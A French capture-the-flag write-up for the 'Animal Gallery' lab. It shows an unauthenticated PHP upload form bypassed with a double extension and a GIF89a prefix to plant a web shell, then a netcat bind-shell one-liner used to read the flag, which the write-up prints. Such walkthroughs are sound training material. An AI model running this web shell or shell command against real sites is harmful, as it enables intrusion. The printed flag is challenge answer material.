# WRITEUP Animal Gallery

## Catégorie :

`Realist`

## Consigne :

```
Le challenge **Animal Gallery** est en 2 parties (2 flags à valider).

Démarrer un environnement virtuel. **Attention** :
 - Garder votre environnement démarré pour ces 2 parties (Partie 2 non diffusée)
 - La durée de vie de l'environnement est limitée


<div>
<button class="btn btn-info" onclick="window.open('/portailvms/26','_blank')" >Accéder au portail</button>
</div>
<p></p>
```

## Pièce(s) jointe(s) :

```
Néant
```

## Serveur :

```
PortailVMS
```

## Difficulté :

```
- part 1 : easy
- part 2 : Non diffusée
```

## Hint :

```
Néant
```

## Flag :

```
- part 1 : `fl@g{N3v3rTrustUs3r1nput}`
- part 2 : Non diffusé
```

## Solution :

### Partie 1

En scannant le site web, nous trouvons 2 fichiers :

 - upload/index.php
 - upload/upload.php

Il semblerait qu'un code soit requis pour la page `index`, mais celui-ci est-t'il requis pour la page `upload` ?

J'essaye d'uploader un fichier :

```bash
curl -F 'categorie=chiens' -F 'fileToUpload=@/home/utilisateur/Desktop/chien.jpg' http://172.24.8.200/upload/upload.php
```

Affichage du message : *Un ou plusieurs champ requis sont manquants ('submit', 'categorie' ou 'fileToUpload')*

Je rajoute le champ *submit*, et je retente de pousser un fichier :

```bash
curl -F 'submit=' -F 'categorie=chiens' -F 'fileToUpload=@/home/utilisateur/Desktop/chien.jpg' http://172.24.8.200/upload/upload.php
```

Bingo, ça a réussi (message : "*Le fichier est une image - image/jpeg.&lt;br&gt;&lt;br&gt;Le fichier chien.jpg est publié.*"). Le **développeur a oublié d'authentifier l'accès à la page upload.php** !

J'essaye d'uploader un script php :

```bash
curl -F 'submit=' -F 'categorie=chiens' -F 'fileToUpload=@/home/utilisateur/Desktop/script.php' http://172.24.8.200/upload/upload.php
```

J'ai le message comme quoi ce n'est pas une image. Une vérification est faite. Je vais essayer de by-passer.


Je pousse une vraie image, se nommant *chien.jpg.php* (juste en rajoutant l'extension `.php`) :

```bash
curl -F 'submit=' -F 'categorie=chiens' -F 'fileToUpload=@/home/utilisateur/Desktop/chien.jpg.php' http://172.24.8.200/upload/upload.php
```

L'upload réussit, la vérification de l'extension est perfectible :-)

Création du fichier *bypass.gif.php*, contenant :

```php
<?php
system($_GET['cmd']); # shellcode goes here
?>
```

Et je tente maintenant de pousser ce script :

```bash
curl -F 'submit=' -F 'categorie=chiens' -F 'fileToUpload=@/home/utilisateur/Desktop/bypass.gif.php' http://172.24.8.200/upload/upload.php
```

Le programme détecte que le fichier n'est pas une image.

Je modifie le fichier *bypass.gif.php* (je préfixe par le magic number `GIF89a;`) :

```php
GIF89a;
<?php
system($_GET['cmd']); # shellcode goes here
?>
```

Puis :

```bash
curl -F 'submit=' -F 'categorie=chiens' -F 'fileToUpload=@/home/utilisateur/Desktop/bypass.gif.php' http://172.24.8.200/upload/upload.php
```

ça a réussi : "*Le fichier est une image - image/gif.&lt;br&gt;&lt;br&gt;Le fichier bypass.gif.php est publié*".


On execute :

```bash
curl http://172.24.8.200/chiens/bypass.gif.php?cmd=id
GIF89a;
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

On peut bien executer des commandes en tant que `www-data`

On créé un shell pour plus de facilité (`rm -f /tmp/f; mkfifo /tmp/f && cat /tmp/f | /bin/bash -i 2>&1 | nc -l 4242 > /tmp/f && rm -f /tmp/f`). Une fois URLencodé :

```bash
curl http://172.24.8.200/chiens/bypass.gif.php?cmd=rm%20-f%20%2Ftmp%2Ff%3B%20mkfifo%20%2Ftmp%2Ff%20%26%26%20cat%20%2Ftmp%2Ff%20%7C%20%2Fbin%2Fbash%20-i%202%3E%261%20%7C%20nc%20-l%204242%20%3E%20%2Ftmp%2Ff%20%26%26%20rm%20-f%20%2Ftmp%2Ff
```

Dans une autre console :

```bash
nc 172.24.8.200 4242
bash: cannot set terminal process group (10947): Inappropriate ioctl for device
bash: no job control in this shell
www-data@host-f9efbf95-eec8-4b44-abe2-7041865ecedc:~/html/chiens$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@host-f9efbf95-eec8-4b44-abe2-7041865ecedc:~/html/chiens$ ls
chien.jpg
14979855572_b60329d847_c.jpg
2212015655_9171be0763_c.jpg
bypass.gif.php
index.php
```

Je liste les fichiers et contenus intéressants jusqu'à trouver mon flag :

```bash
www-data@host-f9efbf95-eec8-4b44-abe2-7041865ecedc:~/html/chiens$ pwd
/var/www/html/chiens
www-data@host-f9efbf95-eec8-4b44-abe2-7041865ecedc:~/html/chiens$ ls -l /var/www/html              
total 96
drwxr-xr-x 1 www-data www-data   238 Oct 20 15:32 chats
drwxr-xr-x 1 www-data www-data   126 Oct 20 14:23 chevaux
drwxr-xr-x 1 www-data www-data   212 Oct 21 15:50 chiens
-rw-r----- 1 root     www-data  1165 Oct 21 14:51 default.css
-rw-r----- 1 root     www-data 15295 Oct 19 09:07 favicon.ico
-rw-r----- 1 root     www-data    47 Oct 21 14:59 flag_f7a049c231b549aa12bd2d111b8ffee5.php
-rw-r----- 1 root     www-data    23 Oct 20 13:54 footer.php
-rw-r----- 1 root     www-data   280 Oct 21 14:48 header.php
-rw-r----- 1 root     www-data   620 Oct 21 14:26 index.php
-rw-r----- 1 root     www-data 20903 Oct 19 12:47 logo2.png
-rw-r----- 1 root     www-data 29908 Oct 20 14:34 moi.jpg
drwxr-xr-x 1 www-data www-data   184 Oct 20 14:26 oiseaux
drwxr-xr-x 1 root     www-data    38 Oct 21 15:23 upload
-rw-r----- 1 root     www-data  2504 Oct 20 14:11 viewer.php
www-data@host-f9efbf95-eec8-4b44-abe2-7041865ecedc:~/html/chiens$ cat /var/www/html/flag_f7a049c231b549aa12bd2d111b8ffee5.php              
<?php
// part 1 : fl@g{N3v3rTrustUs3r1nput}
?>
```

J'ai trouvé le premier flag : `fl@g{N3v3rTrustUs3r1nput}`

### Partie 2

Non diffusée